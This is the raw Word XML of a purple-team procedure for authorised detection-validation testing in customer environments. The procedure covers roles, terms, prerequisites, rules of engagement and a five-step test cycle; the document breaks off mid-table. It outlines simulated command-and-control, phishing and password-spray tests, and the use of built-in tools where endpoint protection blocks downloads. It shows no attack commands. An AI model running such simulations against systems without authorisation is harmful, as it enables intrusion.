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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">STANDARD OPERATING PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Detection Assessment (TDA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Validation Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F386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E2F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat Detection Assessment (TDA) – Detection Validation SOP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Owner</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Offensive Security / Purple Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Effective Date</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____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Review Cycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Annual, or on major tooling/process change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</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Internal – Confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="D9E2F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Approved By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This procedure defines how the team carries out Threat Detection Assessments (TDA). The objective of a TDA is to safely generate the activity that each monitoring use case is designed to catch, and then confirm whether the customer's security controls detect it, prevent it, or miss it entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The outcome of each test is one of three results: the activity was detected (an alert was raised), prevented (the activity was blocked), or a gap (the activity ran and nothing was logged or alerted). This document standardises how those tests are performed, recorded, and reported.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This SOP applies to all detection-validation testing performed by the team against customer environments under an approved engagement. It covers endpoint, network, web application, email, data-loss-prevention, cloud identity, and network-device use cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing is performed from an authorised assessment host inside the customer environment. In most engagements this is a Windows host with local administrator rights. Where endpoint protection (for example Halcyon) blocks the download of tooling, only tools built into the operating system and the browser are used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rP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40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Responsibility</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Assessment Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirms scope and authorisation; agrees the test window with the customer SOC; signs off results.</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Tester</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Executes the use-case procedures, records evidence, and performs cleanup.</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Customer SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Monitors for the generated activity and confirms whether alerts were raised.</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Reviewer</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Quality-checks the results and the final report before delivery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>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40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meaning</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Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A monitoring rule the customer expects to alert on specific malicious activity.</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Detection</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The control saw the activity and raised an alert. Pass.</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Prevention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The control blocked the activity before it completed. Pass.</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Gap</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The activity ran but no alert or log was produced. Fail – requires follow-up.</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EICAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A harmless, industry-standard test file that antivirus and EDR products are required to detect as if it were malware.</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SIEM</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Security Information and Event Management platform (for example Splunk) where alerts are reviewed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Written authorisation and an approved scope for the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An agreed test window communicated to the customer SOC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An authorised assessment host (typically Windows, local administrator).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access to, or a point of contact for, the SIEM to confirm whether alerts fired.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A list of the use cases in scope and, where relevant, the target hosts, subnets, and accounts to use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable process-creation logging on the host before endpoint testing, and set the connection security protocol for web testing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">auditpol /set /subcategory:"Process Creation" /success:enable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">[Net.ServicePointManager]::SecurityProtocol = 'Tls12'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only test systems and accounts that are explicitly in scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use only safe test artefacts (for example EICAR) and fake test data. Never use live malware or real personal data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For command-and-control and phishing tests, only use lab-controlled infrastructure. Never contact real malicious infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agree account lists and a single password before any password-spray test to avoid account lockouts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Record the UTC time and source address of every test and announce each one to the SOC before execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove all test artefacts at the end of each test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every test follows the same five-step cycle. The most important point is how to read the result: a blocked action is a pass, not a failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Record the UTC time, source host, and source address, and notify the SOC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execute the use-case activity from the assessment host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Determine whether the activity ran or was blocked. If a control (endpoint protection, web application firewall, or application-level validation) blocked it, record the result as prevented and capture a screenshot of the block.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the activity ran, confirm with the SIEM whether an alert was raised, and record the result as detected or as a gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove any artefacts created during the test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Detection versus prevention versus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shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
